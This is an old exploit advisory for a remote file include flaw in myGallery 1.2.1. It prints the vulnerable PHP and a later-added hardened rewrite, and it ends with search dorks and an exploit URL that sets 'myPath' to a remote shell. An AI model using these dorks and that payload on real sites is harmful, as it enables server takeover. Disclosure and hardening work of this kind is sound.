myGallery 1.2.1 (myPath) Remote File Include Vulnerability

2007-04-30T00:00:00
ID SECURITYVULNS:DOC:16887
Type securityvulns
Reporter Securityvulns
Modified 2007-04-30T00:00:00

Description

myGallery 1.2.1 (myPath) Remote File Include Vulnerability

Script Page : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip

Discovered by: GolD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

V.Code

if (!$_POST) {
    $mypath = $_GET['myPath'];   // [+] taken straight from the query string
} else {
    $mypath = $_POST['myPath'];  // [+] or from the POST body
}
require_once($mypath.'/wp-config.php');  // [+] request-controlled include path
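
A hardened form of the include above, as an added example that is not part of the original advisory or of myGallery's code: the path to wp-config.php is derived from the script's own location, and a myPath value from the request is only checked, never included. The function names find_wp_config and local_dir_within are hypothetical, and the six-level search depth is an assumption.

```php
<?php
// Added example, not myGallery's own code; function names are hypothetical.

// Find wp-config.php by walking up from a trusted directory (this script's
// own location), so no request data is ever part of the include path.
function find_wp_config(string $startDir, int $maxLevels = 6): ?string
{
    $dir = realpath($startDir);
    for ($i = 0; $dir !== false && $i < $maxLevels; $i++) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) {   // reached the filesystem root
            break;
        }
        $dir = $parent;
    }
    return null;
}

// Accept a caller-supplied path only if it is an existing local directory
// at or below $allowedBase. Returns the canonical path or null.
function local_dir_within(string $userPath, string $allowedBase): ?string
{
    // Refuse stream wrappers (http://, ftp://, php://, data: ...) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $userPath) || strpos($userPath, "\0") !== false) {
        return null;
    }
    $real = realpath($userPath);   // false for anything not on local disk
    $base = realpath($allowedBase);
    if ($real === false || $base === false || !is_dir($real)) {
        return null;
    }
    // Compare with trailing separators so /var/www-x does not match /var/www.
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $probe = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($probe, $base, strlen($base)) === 0 ? $real : null;
}

$config = find_wp_config(__DIR__);
$legacy = $_POST['myPath'] ?? $_GET['myPath'] ?? null;   // still sent by old callers
if ($config === null || ($legacy !== null
    && (!is_string($legacy) || local_dir_within($legacy, dirname($config)) === null))) {
    http_response_code(400);
    exit('Bad request');
}
require_once $config;   // path derived server-side only
```

Keeping allow_url_include set to Off in php.ini additionally stops require_once from fetching remote URLs where a pattern like the original remains in other files.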

Dork :

inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php

Ex:

[Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell

Sp.Thanx = Tryag-Team

milw0rm.com [2007-04-29]